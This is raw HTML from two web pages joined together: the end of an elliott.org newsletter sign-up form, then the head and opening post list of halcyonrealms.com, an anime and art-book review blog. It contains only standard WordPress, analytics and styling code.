url(http://www.elliott.org/wp-content/plugins/mailoptin/src/core/src/assets/images/spinner.gif) 50% 50% no-repeat; left: 0; top: 0; opacity: 0.99; filter: alpha(opacity=80); } #scThpZHlNB .mo-optin-form-container .mo-optin-success-close { font-size: 32px !important; font-family: "HelveticaNeue - Light", "Helvetica Neue Light", "Helvetica Neue", Helvetica, Arial, "Lucida Grande", sans-serif !important; color: #282828 !important; font-weight: 300 !important; position: absolute !important; top: 0 !important; right: 10px !important; background: none !important; text-decoration: none !important; width: auto !important; height: auto !important; display: block !important; line-height: 32px !important; padding: 0 !important; -moz-box-shadow: none !important; -webkit-box-shadow: none !important; box-shadow: none !important; } #scThpZHlNB .mo-optin-form-container .mo-optin-form-wrapper .mo-optin-success-msg { font-size: 21px; font-family: "HelveticaNeue - Light", "Helvetica Neue Light", "Helvetica Neue", Helvetica, Arial, "Lucida Grande", sans-serif; color: #282828 !important; font-weight: 300; text-align: center; margin: 0 auto; width: 100%; position: absolute !important; left: 50%; top: 50%; -webkit-transform: translate(-50%, -50%); -moz-transform: translate(-50%, -50%); -o-transform: translate(-50%, -50%); -ms-transform: translate(-50%, -50%); transform: translate(-50%, -50%); } #scThpZHlNB .mo-optin-form-container .mo-optin-form-wrapper .mo-optin-success-msg a { color: #0000EE; text-decoration: underline; }div#scThpZHlNB div#scThpZHlNB_lightbox .mo-optin-form-headline, div#scThpZHlNB div.mo-optin-form-container h2, div#scThpZHlNB div.mo-optin-form-container h1 { font-size: 32px !important; }div#scThpZHlNB div#scThpZHlNB_lightbox .mo-optin-form-description, div#scThpZHlNB div.mo-optin-form-container div#scThpZHlNB_lightbox p { font-size: 20px !important; }div#scThpZHlNB div#scThpZHlNB_lightbox .mo-optin-form-note { font-size: 16px !important; }@media screen and (max-width: 768px) { div#scThpZHlNB div#scThpZHlNB_lightbox .mo-optin-form-headline, div#scThpZHlNB div.mo-optin-form-container div#scThpZHlNB_lightbox h2, div#scThpZHlNB div.mo-optin-form-container div#scThpZHlNB_lightbox h1 { font-size: 30px !important; } div#scThpZHlNB div#scThpZHlNB_lightbox .mo-optin-form-description, div#scThpZHlNB div.mo-optin-form-container div#scThpZHlNB_lightbox p { font-size: 20px !important; } div#scThpZHlNB div#scThpZHlNB_lightbox .mo-optin-form-note { font-size: 16px !important; } }@media screen and (max-width: 480px) { div#scThpZHlNB div#scThpZHlNB_lightbox .mo-optin-form-headline, div#scThpZHlNB div.mo-optin-form-container div#scThpZHlNB_lightbox h2, div#scThpZHlNB div.mo-optin-form-container div#scThpZHlNB_lightbox h1 { font-size: 25px !important; } div#scThpZHlNB div#scThpZHlNB_lightbox .mo-optin-form-description, div#scThpZHlNB div.mo-optin-form-container div#scThpZHlNB_lightbox p { font-size: 16px !important; } div#scThpZHlNB div#scThpZHlNB_lightbox .mo-optin-form-note, div#scThpZHlNB div#scThpZHlNB_lightbox .mo-optin-form-note * { font-size: 12px !important; } }div#scThpZHlNB .mo-mailchimp-interest-container { margin: 0 10px 2px; } div#scThpZHlNB .mo-mailchimp-interest-label { font-size: 16px; margin: 5px 0 2px; } div#scThpZHlNB input.mo-mailchimp-interest-choice { line-height: normal; border: 0; margin: 0 5px; } div#scThpZHlNB span.mo-mailchimp-choice-label { vertical-align: middle; font-size: 14px; } div#scThpZHlNB .mo-mailchimp-interest-choice-container { margin: 5px 0; }</style><div id="scThpZHlNB_lightbox" class="mo-optin-form-wrapper mo-has-name-email moEleganceModal" style="position: relative;margin-right: auto;margin-left: auto;background: #ffffff;border-color: #ffffff;line-height: normal;"><form method="post" class='mo-optin-form' id='scThpZHlNB_lightbox_form' style='margin:0;'><a href='#' rel="moOptin:close" title="Close optin form" class="mo-optin-form-close-icon moEleganceModalclose" style=''></a><h2 class="mo-optin-form-headline moElegance_header" style="color: #000000;font-family: Arial, Helvetica, Arial, sans-serif; padding: 0;">Don't Miss a Single Story!</h2><div class="mo-optin-form-description moElegance_description" style="color: #777777;font-family: Arial, Helvetica, Arial, sans-serif;"><p>Our free daily newsletter will keep you informed on the latest cases. Plus, we have insightful letters, insider tips, and more. What are you waiting for?</p></div><div class="mo-optin-error " style=''>Invalid email address</div><div class="mo-optin-fields-wrapper " style=""><input id="scThpZHlNB_lightbox_name_field" class="mo-optin-field mo-optin-form-name-field moEleganceModal_input_fields" style='color: #000;height: auto;font-family: Arial, Helvetica, sans-serif;' type="text" placeholder="Your Name" name="mo-name" autocomplete="on"> <input id="scThpZHlNB_lightbox_email_field" class="mo-optin-field mo-optin-form-email-field moEleganceModal_input_fields" style="color: #000;height: auto;font-family: Arial, Helvetica, sans-serif;" type="email" placeholder="Your email" name="mo-email" autocomplete="on"> <input id="scThpZHlNB_lightbox_submit_button" class="mo-optin-form-submit-button moEleganceModal_button" style="background: #2785C8;color: #ffffff;height: auto;text-shadow: none;font-family: Arial, Helvetica, Arial, sans-serif;" type="submit" value="Sign me up"> </div><input id="scThpZHlNB_lightbox_cta_button" class="mo-optin-form-cta-button moEleganceModal_button" style="background: #2785C8;color: #ffffff;height: auto;text-shadow: none;font-family: 'Titillium Web', Helvetica, Arial, sans-serif;display: none;" type="submit" value="Take Action Now!"> <div class="mo-optin-form-note moElegance_note" style="color: #000000;font-family: Arial, Helvetica, Arial, sans-serif;"><span class="mo-note-content"><em>We promise not to spam you. You can unsubscribe at any time.</em></span></div><input id='scThpZHlNB_lightbox_honeypot_email_field' type='text' name='email' value='' style='display:none' /><input id="scThpZHlNB_lightbox_honeypot_website_field" type="text" name="website" value="" style="display:none" /></form><div class='mo-optin-spinner' style='display:none'></div><div class="mo-optin-success-msg" style="display:none">Thanks for subscribing! Please check your email for further instructions.</div></div></div></div> <input id="scThpZHlNB_lightbox_honeypot_timestamp" type="hidden" name="mo-timestamp" value="1558024234" style="display:none" /> </body> </html>
0
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en-US" prefix="og: http://ogp.me/ns#"> <head profile="http://gmpg.org/xfn/11"> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /> <link rel="stylesheet" href="http://cdn.halcyonrealms.com/wp-content/themes/VersatilityLite/style.css" type="text/css" media="screen" /> <link rel="alternate" type="application/rss+xml" title="Halcyon Realms &#8211; Art Book Reviews &#8211; Anime, Manga, Film, Photography RSS Feed" href="http://halcyonrealms.com/feed/" /> <link rel="pingback" href="http://halcyonrealms.com/xmlrpc.php" /> <!--[if lte IE 6]> <script src="http://cdn.halcyonrealms.com/wp-content/themes/VersatilityLite/js/sfhover.js" type="text/javascript"></script> <![endif]--> <!-- This site is optimized with the Yoast SEO plugin v3.1.2 - https://yoast.com/wordpress/plugins/seo/ --> <title>Halcyon Realms - Art Book Reviews - Anime, Manga, Film, Photography -</title> <meta name="description" content="The top resource for anime and Japanese art book reviews."/> <meta name="robots" content="noodp"/> <link rel="canonical" href="http://halcyonrealms.com" /> <link rel="next" href="http://halcyonrealms.com/page/2/" /> <link rel="publisher" href="https://www.google.com/+blauereiterder"/> <meta property="og:locale" content="en_US" /> <meta property="og:type" content="website" /> <meta property="og:title" content="Halcyon Realms - Art Book Reviews - Anime, Manga, Film, Photography -" /> <meta property="og:description" content="The top resource for anime and Japanese art book reviews." /> <meta property="og:url" content="http://halcyonrealms.com" /> <meta property="og:site_name" content="Halcyon Realms - Art Book Reviews - Anime, Manga, Film, Photography" /> <script type='application/ld+json'>{"@context":"http:\/\/schema.org","@type":"WebSite","url":"http:\/\/halcyonrealms.com\/","name":"Halcyon Realms - Art Book Reviews - Anime, Manga, Film, Photography","potentialAction":{"@type":"SearchAction","target":"http:\/\/halcyonrealms.com\/?s={search_term_string}","query-input":"required name=search_term_string"}}</script> <!-- / Yoast SEO plugin. --> <link rel='dns-prefetch' href='//s0.wp.com' /> <link rel='dns-prefetch' href='//fonts.googleapis.com' /> <link rel='dns-prefetch' href='//s.w.org' /> <!-- This site uses the Google Analytics by MonsterInsights plugin v7.0.9 - Using Analytics tracking - https://www.monsterinsights.com/ --> <script type="text/javascript" data-cfasync="false"> var mi_track_user = true; var mi_no_track_reason = ''; var disableStr = 'ga-disable-UA-52098350-1'; /* Function to detect opted out users */ function __gaTrackerIsOptedOut() { return document.cookie.indexOf(disableStr + '=true') > -1; } /* Disable tracking if the opt-out cookie exists. */ if ( __gaTrackerIsOptedOut() ) { window[disableStr] = true; } /* Opt-out function */ function __gaTrackerOptout() { document.cookie = disableStr + '=true; expires=Thu, 31 Dec 2099 23:59:59 UTC; path=/'; window[disableStr] = true; } if ( mi_track_user ) { (function(i,s,o,g,r,a,m){i['GoogleAnalyticsObject']=r;i[r]=i[r]||function(){ (i[r].q=i[r].q||[]).push(arguments)},i[r].l=1*new Date();a=s.createElement(o), m=s.getElementsByTagName(o)[0];a.async=1;a.src=g;m.parentNode.insertBefore(a,m) })(window,document,'script','//www.google-analytics.com/analytics.js','__gaTracker'); __gaTracker('create', 'UA-52098350-1', 'auto'); __gaTracker('set', 'forceSSL', true); __gaTracker('require', 'displayfeatures'); __gaTracker('require', 'linkid', 'linkid.js'); __gaTracker('send','pageview'); } else { console.log( "" ); (function() { /* https://developers.google.com/analytics/devguides/collection/analyticsjs/ */ var noopfn = function() { return null; }; var noopnullfn = function() { return null; }; var Tracker = function() { return null; }; var p = Tracker.prototype; p.get = noopfn; p.set = noopfn; p.send = noopfn; var __gaTracker = function() { var len = arguments.length; if ( len === 0 ) { return; } var f = arguments[len-1]; if ( typeof f !== 'object' || f === null || typeof f.hitCallback !== 'function' ) { console.log( 'Not running function __gaTracker(' + arguments[0] + " ....) because you are not being tracked. " + mi_no_track_reason ); return; } try { f.hitCallback(); } catch (ex) { } }; __gaTracker.create = function() { return new Tracker(); }; __gaTracker.getByName = noopnullfn; __gaTracker.getAll = function() { return []; }; __gaTracker.remove = noopfn; window['__gaTracker'] = __gaTracker; })(); } </script> <!-- / Google Analytics by MonsterInsights --> <script type="text/javascript"> window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/11\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/11\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/halcyonrealms.com\/wp-includes\/js\/wp-emoji-release.min.js?ver=4.9.10"}}; !function(a,b,c){function d(a,b){var c=String.fromCharCode;l.clearRect(0,0,k.width,k.height),l.fillText(c.apply(this,a),0,0);var d=k.toDataURL();l.clearRect(0,0,k.width,k.height),l.fillText(c.apply(this,b),0,0);var e=k.toDataURL();return d===e}function e(a){var b;if(!l||!l.fillText)return!1;switch(l.textBaseline="top",l.font="600 32px Arial",a){case"flag":return!(b=d([55356,56826,55356,56819],[55356,56826,8203,55356,56819]))&&(b=d([55356,57332,56128,56423,56128,56418,56128,56421,56128,56430,56128,56423,56128,56447],[55356,57332,8203,56128,56423,8203,56128,56418,8203,56128,56421,8203,56128,56430,8203,56128,56423,8203,56128,56447]),!b);case"emoji":return b=d([55358,56760,9792,65039],[55358,56760,8203,9792,65039]),!b}return!1}function f(a){var c=b.createElement("script");c.src=a,c.defer=c.type="text/javascript",b.getElementsByTagName("head")[0].appendChild(c)}var g,h,i,j,k=b.createElement("canvas"),l=k.getContext&&k.getContext("2d");for(j=Array("flag","emoji"),c.supports={everything:!0,everythingExceptFlag:!0},i=0;i<j.length;i++)c.supports[j[i]]=e(j[i]),c.supports.everything=c.supports.everything&&c.supports[j[i]],"flag"!==j[i]&&(c.supports.everythingExceptFlag=c.supports.everythingExceptFlag&&c.supports[j[i]]);c.supports.everythingExceptFlag=c.supports.everythingExceptFlag&&!c.supports.flag,c.DOMReady=!1,c.readyCallback=function(){c.DOMReady=!0},c.supports.everything||(h=function(){c.readyCallback()},b.addEventListener?(b.addEventListener("DOMContentLoaded",h,!1),a.addEventListener("load",h,!1)):(a.attachEvent("onload",h),b.attachEvent("onreadystatechange",function(){"complete"===b.readyState&&c.readyCallback()})),g=c.source||{},g.concatemoji?f(g.concatemoji):g.wpemoji&&g.twemoji&&(f(g.twemoji),f(g.wpemoji)))}(window,document,window._wpemojiSettings); </script> <style type="text/css"> img.wp-smiley, img.emoji { display: inline !important; border: none !important; box-shadow: none !important; height: 1em !important; width: 1em !important; margin: 0 .07em !important; vertical-align: -0.1em !important; background: none !important; padding: 0 !important; } </style> <link rel='stylesheet' id='yarppWidgetCss-css' href='http://cdn.halcyonrealms.com/wp-content/plugins/yet-another-related-posts-plugin/style/widget.css?ver=4.9.10' type='text/css' media='all' /> <link rel='stylesheet' id='googlefonts-css' href='http://fonts.googleapis.com/css?family=Arvo:400,400italic,700,700italic' type='text/css' media='all' /> <link rel='stylesheet' id='wp-pagenavi-css' href='http://cdn.halcyonrealms.com/wp-content/plugins/wp-pagenavi/pagenavi-css.css?ver=2.70' type='text/css' media='all' /> <!-- Inline jetpack_facebook_likebox --> <style id='jetpack_facebook_likebox-inline-css' type='text/css'> .widget_facebook_likebox { overflow: hidden; } </style> <link rel='stylesheet' id='jetpack_css-css' href='http://cdn.halcyonrealms.com/wp-content/plugins/jetpack/css/jetpack.css?ver=7.1.1' type='text/css' media='all' /> <script type="text/javascript" src="https://apis.google.com/js/plusone.js">{lang: "en-US"}</script><script type='text/javascript' src='http://cdn.halcyonrealms.com/wp-includes/js/jquery/jquery.js?ver=1.12.4'></script> <script type='text/javascript' src='http://cdn.halcyonrealms.com/wp-includes/js/jquery/jquery-migrate.min.js?ver=1.4.1'></script> <script type='text/javascript'> /* <![CDATA[ */ var monsterinsights_frontend = {"js_events_tracking":"true","is_debug_mode":"false","download_extensions":"doc,exe,js,pdf,ppt,tgz,zip,xls","inbound_paths":"","home_url":"http:\/\/halcyonrealms.com","track_download_as":"event","internal_label":"int","hash_tracking":"false"}; /* ]]> */ </script> <script type='text/javascript' src='http://cdn.halcyonrealms.com/wp-content/plugins/google-analytics-for-wordpress/assets/js/frontend.min.js?ver=7.0.9'></script> <link rel='https://api.w.org/' href='http://halcyonrealms.com/wp-json/' /> <link rel="EditURI" type="application/rsd+xml" title="RSD" href="http://halcyonrealms.com/xmlrpc.php?rsd" /> <link rel="wlwmanifest" type="application/wlwmanifest+xml" href="http://cdn.halcyonrealms.com/wp-includes/wlwmanifest.xml" /> <meta name="generator" content="WordPress 4.9.10" /> <link rel='shortlink' href='https://wp.me/6Zri' /> <style type='text/css'> #wpadminbar .quicklinks li#wp-admin-bar-clickystats { height: 28px } #wpadminbar .quicklinks li#wp-admin-bar-clickystats a { height: 28px; padding: 0 } #wpadminbar .quicklinks li#wp-admin-bar-clickystats a img { padding: 4px 5px; height: 20px; width: 99px; } </style> <script> jQuery(document).ready(function() { // expand-content-link renamed to expand-cnt-link for compatibility with twentyfourteen theme jQuery(".expand-content-link").removeClass("expand-content-link").addClass("expand-cnt-link"); jQuery(".expand-cnt-link").click(function() { jQuery(this).toggleClass("ecf_closed").parent(".exp-col-content-holder").find(".hidden-content").first().stop().slideToggle("slow").css("display","block"); return false; }); jQuery(".expand-cnt-link").toggleClass("ecf_closed").parent(".exp-col-content-holder").find(".hidden-content").css("display","none"); //images with no float styles , get floated left if(typeof jQuery(".hidden-content > img").attr("float") === "undefined") { jQuery(".hidden-content > img:not([class])").addClass("alignleft"); } /* jQuery(".hidden-content").each(function() { if (jQuery(this).find("img").length) { var hiddenContentpLength = jQuery(this).find(".hiddenContentp").text().length; if( hiddenContentpLength < 200 ) { jQuery(this).css("height","150px"); } } }); */ jQuery(".textwidget > .exp-col-content-holder > .hidden-content > img+p").attr("style","display:inherit !important;"); }); </script><style> .expand-cnt-link { font-weight:bold; display:block; margin-bottom:.5em; } .expand-cnt-link:before { font-family: "ecf-icons"; content: "\e601 "; font-size:16px; } .hidden-content { display:block; vertical-align:top} .exp-col-content-holder { margin:15px 0px 15px 0 !important; } .exp-col-content-holder a { display:inline; } .exp-col-content-holder+p, .exp-col-content-holder img+p, .expand-cnt-link+p { display:none !important; } .ecf_closed:before { font-family: "ecf-icons"; content: "\e600 "; font-size:16px; } .hiddenContentp { margin:0 !important; } .hiddenContentp+p { display:none;} .hidden-content img { width:70%; } .hidden-content img.alignright { margin-right:0 !important; margin-left:10px; margin-bottom:0px; } .hidden-content img.alignleft { margin-left:0 !important; margin-right:10px; margin-bottom:0px; } .hidden-content .videoWrapper+p { margin-bottom:0; } @font-face { font-family: "ecf-icons"; src: url("fonts/ecf-icons.eot"); } @font-face { font-family: "ecf-icons"; src: url(data:application/x-font-ttf;charset=utf-8;base64,AAEAAAALAIAAAwAwT1MvMg6v8ysAAAC8AAAAYGNtYXDL8hqdAAABHAAAADxnYXNwAAAAEAAAAVgAAAAIZ2x5ZpFu6gUAAAFgAAABZGhlYWT+7sbiAAACxAAAADZoaGVhBigD3wAAAvwAAAAkaG10eAbbADMAAAMgAAAAEGxvY2EAvABeAAADMAAAAAptYXhwAAcAOAAAAzwAAAAgbmFtZUPPHeQAAANcAAABS3Bvc3QAAwAAAAAEqAAAACAAAwQAAZAABQAAApkCzAAAAI8CmQLMAAAB6wAzAQkAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABAACDmAQPA/8D/wAPAAEAAAAAAAAAAAAAAAAAAAAAgAAAAAAACAAAAAwAAABQAAwABAAAAFAAEACgAAAAGAAQAAQACACDmAf//AAAAIOYA////4RoCAAEAAAAAAAAAAQAB//8ADwABAAAAAAAAAAAAAgAANzkBAAAAAAIABwC+Ai8C+QAaADUAAAEUBwEGIyIvASY1ND8BJyY1ND8BNjMyFwEWFTMUBwEGIyIvASY1ND8BJyY1ND8BNjMyFwEWFQFUBv72BgcIBR0GBuHhBgYdBQgHBgEKBtsF/vUFCAcGHAYG4OAGBhwGBwgFAQsFAdsHBv72BgYdBQgHBuDhBgcIBR0GBv72BggHBv72BgYdBQgHBuDhBgcIBR0GBv72BggAAAIALAD1AmYDHQAaADUAAAEUBwEGIyInASY1ND8BNjMyHwE3NjMyHwEWFTUUBwEGIyInASY1ND8BNjMyHwE3NjMyHwEWFQJmBf71BQgHBv72BgYcBgcIBuDhBQgHBh0FBf71BQgHBv72BgYcBgcIBuDhBQgHBh0FAhIHBv72BgYBCgYHCAUdBgbh4QYGHQUI3AgF/vUFBQELBQgHBhwGBuDgBgYcBgcAAAEAAAABAADFBlcuXw889QALBAAAAAAAzrVBZAAAAADOtUFkAAAAAAJmAx0AAAAIAAIAAAAAAAAAAQAAA8D/wAAABAAAAAAaAmYAAQAAAAAAAAAAAAAAAAAAAAQAAAAAAgAAAAJJAAcCkgAsAAAAAAAKAF4AsgAAAAEAAAAEADYAAgAAAAAAAgAAAAAAAAAAAAAAAAAAAAAAAAAOAK4AAQAAAAAAAQASAAAAAQAAAAAAAgAOAFUAAQAAAAAAAwASACgAAQAAAAAABAASAGMAAQAAAAAABQAWABIAAQAAAAAABgAJADoAAQAAAAAACgAoAHUAAwABBAkAAQASAAAAAwABBAkAAgAOAFUAAwABBAkAAwASACgAAwABBAkABAASAGMAAwABBAkABQAWABIAAwABBAkABgASAEMAAwABBAkACgAoAHUAZQBjAGYALQBpAGMAbwBuAHMAVgBlAHIAcwBpAG8AbgAgADAALgAwAGUAYwBmAC0AaQBjAG8AbgBzZWNmLWljb25zAGUAYwBmAC0AaQBjAG8AbgBzAFIAZQBnAHUAbABhAHIAZQBjAGYALQBpAGMAbwBuAHMARwBlAG4AZQByAGEAdABlAGQAIABiAHkAIABJAGMAbwBNAG8AbwBuAAADAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA) format("truetype"), url(data:application/font-woff;charset=utf-8;base64,d09GRgABAAAAAAUUAAsAAAAABMgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABPUy8yAAABCAAAAGAAAABgDq/zK2NtYXAAAAFoAAAAPAAAADzL8hqdZ2FzcAAAAaQAAAAIAAAACAAAABBnbHlmAAABrAAAAWQAAAFkkW7qBWhlYWQAAAMQAAAANgAAADb+7sbiaGhlYQAAA0gAAAAkAAAAJAYoA99obXR4AAADbAAAABAAAAAQBtsAM2xvY2EAAAN8AAAACgAAAAoAvABebWF4cAAAA4gAAAAgAAAAIAAHADhuYW1lAAADqAAAAUsAAAFLQ88d5HBvc3QAAAT0AAAAIAAAACAAAwAAAAMEAAGQAAUAAAKZAswAAACPApkCzAAAAesAMwEJAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAQAAg5gEDwP/A/8ADwABAAAAAAAAAAAAAAAAAAAAAIAAAAAAAAgAAAAMAAAAUAAMAAQAAABQABAAoAAAABgAEAAEAAgAg5gH//wAAACDmAP///+EaAgABAAAAAAAAAAEAAf//AA8AAQAAAAAAAAAAAAIAADc5AQAAAAACAAcAvgIvAvkAGgA1AAABFAcBBiMiLwEmNTQ/AScmNTQ/ATYzMhcBFhUzFAcBBiMiLwEmNTQ/AScmNTQ/ATYzMhcBFhUBVAb+9gYHCAUdBgbh4QYGHQUIBwYBCgbbBf71BQgHBhwGBuDgBgYcBgcIBQELBQHbBwb+9gYGHQUIBwbg4QYHCAUdBgb+9gYIBwb+9gYGHQUIBwbg4QYHCAUdBgb+9gYIAAACACwA9QJmAx0AGgA1AAABFAcBBiMiJwEmNTQ/ATYzMh8BNzYzMh8BFhU1FAcBBiMiJwEmNTQ/ATYzMh8BNzYzMh8BFhUCZgX+9QUIBwb+9gYGHAYHCAbg4QUIBwYdBQX+9QUIBwb+9gYGHAYHCAbg4QUIBwYdBQISBwb+9gYGAQoGBwgFHQYG4eEGBh0FCNwIBf71BQUBCwUIBwYcBgbg4AYGHAYHAAABAAAAAQAAxQZXLl8PPPUACwQAAAAAAM61QWQAAAAAzrVBZAAAAAACZgMdAAAACAACAAAAAAAAAAEAAAPA/8AAAAQAAAAAGgJmAAEAAAAAAAAAAAAAAAAAAAAEAAAAAAIAAAACSQAHApIALAAAAAAACgBeALIAAAABAAAABAA2AAIAAAAAAAIAAAAAAAAAAAAAAAAAAAAAAAAADgCuAAEAAAAAAAEAEgAAAAEAAAAAAAIADgBVAAEAAAAAAAMAEgAoAAEAAAAAAAQAEgBjAAEAAAAAAAUAFgASAAEAAAAAAAYACQA6AAEAAAAAAAoAKAB1AAMAAQQJAAEAEgAAAAMAAQQJAAIADgBVAAMAAQQJAAMAEgAoAAMAAQQJAAQAEgBjAAMAAQQJAAUAFgASAAMAAQQJAAYAEgBDAAMAAQQJAAoAKAB1AGUAYwBmAC0AaQBjAG8AbgBzAFYAZQByAHMAaQBvAG4AIAAwAC4AMABlAGMAZgAtAGkAYwBvAG4Ac2VjZi1pY29ucwBlAGMAZgAtAGkAYwBvAG4AcwBSAGUAZwB1AGwAYQByAGUAYwBmAC0AaQBjAG8AbgBzAEcAZQBuAGUAcgBhAHQAZQBkACAAYgB5ACAASQBjAG8ATQBvAG8AbgAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA==) format("woff"); font-weight: normal; font-style: normal; } [class^="ecf-icon-"], [class*=" ecf-icon-"] { font-family: "ecf-icons"; speak: none; font-style: normal; font-weight: normal; font-variant: normal; text-transform: none; line-height: 1; /* Better Font Rendering =========== */ -webkit-font-smoothing: antialiased; -moz-osx-font-smoothing: grayscale; } .videoWrapper { position: relative; padding-bottom: 56.25%; /* 16:9 */ padding-top: 25px; height: 0; } .videoWrapper iframe { position: absolute; top: 0; left: 0; width: 100%; height: 100%; } </style><style type='text/css' media='screen'> body{ font-family:"Arvo", arial, sans-serif;} #container h2 </style> <!-- fonts delivered by Wordpress Google Fonts, a plugin by Adrian3.com --> <link rel='dns-prefetch' href='//v0.wordpress.com'/> <link rel='dns-prefetch' href='//i0.wp.com'/> <link rel='dns-prefetch' href='//i1.wp.com'/> <link rel='dns-prefetch' href='//i2.wp.com'/> <style type="text/css" id="wp-custom-css"> img { height: auto; } </style> <link REL="SHORTCUT ICON" HREF="http://halcyonrealms.com/blogpics/favicon1.ico"> </head> <body> <div id="page"> <div class="top-header"> <div id="logo"><a href="http://halcyonrealms.com/"><img src="http://cdn.halcyonrealms.com/wp-content/themes/k2/styles/hrealms/header/headernew01.jpg" alt="Back to Halcyon Realms main page" title="Back to Halcyon Realms main page"/></a></div> <ul id="nav"> <li class="current-cat"><a href="http://halcyonrealms.com/" class="home">Home</a></li> <li class="page_item page-item-2"><a href="http://halcyonrealms.com/about/">About</a></li> <li class="page_item page-item-7"><a href="http://halcyonrealms.com/store/">Art Book Reviews</a></li> <li class="page_item page-item-12027"><a href="http://halcyonrealms.com/photos/">photos</a></li> <li class="page_item page-item-6"><a href="http://halcyonrealms.com/contact/">Contact</a></li> <li class="page_item page-item-5332"><a href="http://halcyonrealms.com/archivepage/">Archives</a></li> <li class="page_item page-item-460"><a href="http://halcyonrealms.com/films/">Films</a></li> <li class="page_item page-item-6650"><a href="http://halcyonrealms.com/links/">links</a></li> <li class="page_item page-item-4"><a href="http://halcyonrealms.com/subscribe/">Subscribe</a></li> </ul> <div class="wrap-middle"> <div id="breather" /* THIS IS JUST A HORIZONTAL BAR OF EMPTY SPACE */ ></div> <div id="content"> <div id="latestpost">&nbsp;&nbsp;&nbsp;&nbsp;<img src="http://halcyonrealms.com/blogpics/latestpost.gif"></div> <div class="row"> <div class="post col1" id="post-82156"> <h2 class="link" height ="40"><a href="http://halcyonrealms.com/illustration/tatsuyuki-tanaka-short-novel-art-covers/" rel="bookmark" title="Permanent Link to Tatsuyuki Tanaka Short Novel Art Covers">Tatsuyuki Tanaka Short Novel Art Covers</a></h2> <div class="top-tools"></div> <div class="entry"> <p><a href="http://halcyonrealms.com/illustration/tatsuyuki-tanaka-short-novel-art-covers/"><img src="https://i0.wp.com/halcyonrealms.com/blogpics/tatsuyukicovers01.jpg?resize=750%2C500" width="750" height="500" alt="Tatsuyuki Tanaka Short Novel Art Covers" title="Tatsuyuki Tanaka Short Novel Art Covers" class="alignnone size-medium" data-recalc-dims="1" /></a> <a href="http://halcyonrealms.com/illustration/tatsuyuki-tanaka-short-novel-art-covers/#more-82156" class="more-link"><span aria-label="Continue reading Tatsuyuki Tanaka Short Novel Art Covers">(more&hellip;)</span></a></p> </div> <div class="tools"><div class="float-left"><span><span>May 16th 2019</span> </div><div class="float-right"> <a href="http://halcyonrealms.com/illustration/tatsuyuki-tanaka-short-novel-art-covers/#comments"><span>Comments</span> (1)</a></div></div> </div> </div> <div class="post col2" id="post-81731"> <h2 class="link" height ="40"><a href="http://halcyonrealms.com/books/nakahara-arisa-illustration-works-art-book-review/" rel="bookmark" title="Permanent Link to Nakahara Arisa Illustration Works Art Book Review">Nakahara Arisa Illustration Works Art Book Review</a></h2> <div class="top-tools"></div> <div class="entry"> <p><a href="http://halcyonrealms.com/books/nakahara-arisa-illustration-works-art-book-review/"><img src="https://i0.wp.com/halcyonrealms.com/blogpics/nakahara14.jpg?resize=750%2C500" width="750" height="500" alt="Nakahara Arisa Illustration Works Book Review" title="Nakahara Arisa Illustration Works Book Review" class="alignnone size-medium" data-recalc-dims="1" /></a> <a href="http://halcyonrealms.com/books/nakahara-arisa-illustration-works-art-book-review/#more-81731" class="more-link"><span aria-label="Continue reading Nakahara Arisa Illustration Works Art Book Review">(more&hellip;)</span></a></p> </div> <div class="tools"><div class="float-left"><span><span>May 13th 2019</span> </div><div class="float-right"> <a href="http://halcyonrealms.com/books/nakahara-arisa-illustration-works-art-book-review/#respond"><span>Comments</span> (0)</a></div></div> </div> <div class="row"> <div class="post col1" id="post-81396"> <h2 class="link" height ="40"><a href="http://halcyonrealms.com/film/spider-man-far-from-home-trailer-2/" rel="bookmark" title="Permanent Link to Spider-Man : Far From Home Trailer 2">Spider-Man : Far From Home Trailer 2</a></h2> <div class="top-tools"></div> <div class="entry"> <p><a href="http://halcyonrealms.com/film/spider-man-far-from-home-trailer-2/"><img src="https://i2.wp.com/halcyonrealms.com/blogpics/spidermanffh01.jpg?resize=750%2C500" width="750" height="500" alt="Spider-Man : Far From Home Trailer 2" title="Spider-Man : Far From Home Trailer 2" class="alignnone size-medium" data-recalc-dims="1" /></a> <a href="http://halcyonrealms.com/film/spider-man-far-from-home-trailer-2/#more-81396" class="more-link"><span aria-label="Continue reading Spider-Man : Far From Home Trailer 2">(more&hellip;)</span></a></p> </div> <div class="tools"><div class="float-left"><span><span>May 11th 2019</span> </div><div class="float-right"> <a href="http://halcyonrealms.com/film/spider-man-far-from-home-trailer-2/#respond"><span>Comments</span> (0)</a></div></div> </div> </div> <div class="post col2" id="post-80114"> <h2 class="link" height ="40"><a href="http://halcyonrealms.com/books/making-solo-a-star-wars-story-book-review/" rel="bookmark" title="Permanent Link to Making Solo: A Star Wars Story Book Review">Making Solo: A Star Wars Story Book Review</a></h2> <div class="top-tools"></div> <div class="entry"> <p><a href="http://halcyonrealms.com/books/making-solo-a-star-wars-story-book-review/"><img class="alignnone size-medium" title="Making Solo: A Star Wars Story Book Review" src="https://i0.wp.com/halcyonrealms.com/blogpics/makingsolo21.jpg?resize=750%2C500" alt="Making Solo: A Star Wars Story Book Review" width="750" height="500" data-recalc-dims="1" /></a> <a href="http://halcyonrealms.com/books/making-solo-a-star-wars-story-book-review/#more-80114" class="more-link"><span aria-label="Continue reading Making Solo: A Star Wars Story Book Review">(more&hellip;)</span></a></p> </div> <div class="tools"><div class="float-left"><span><span>May 7th 2019</span> </div><div class="float-right"> <a href="http://halcyonrealms.com/books/making-solo-a-star-wars-story-book-review/#comments"><span>Comments</span> (1)</a></div></div> </div> <div class="row"> <div class="post col1" id="post-79405"> <h2 class="link" height ="40"><a href="http://halcyonrealms.com/books/the-mood-is-already-of-war-3-chapter-1-otomo-katsuhiro-manga-review/" rel="bookmark" title="Permanent Link 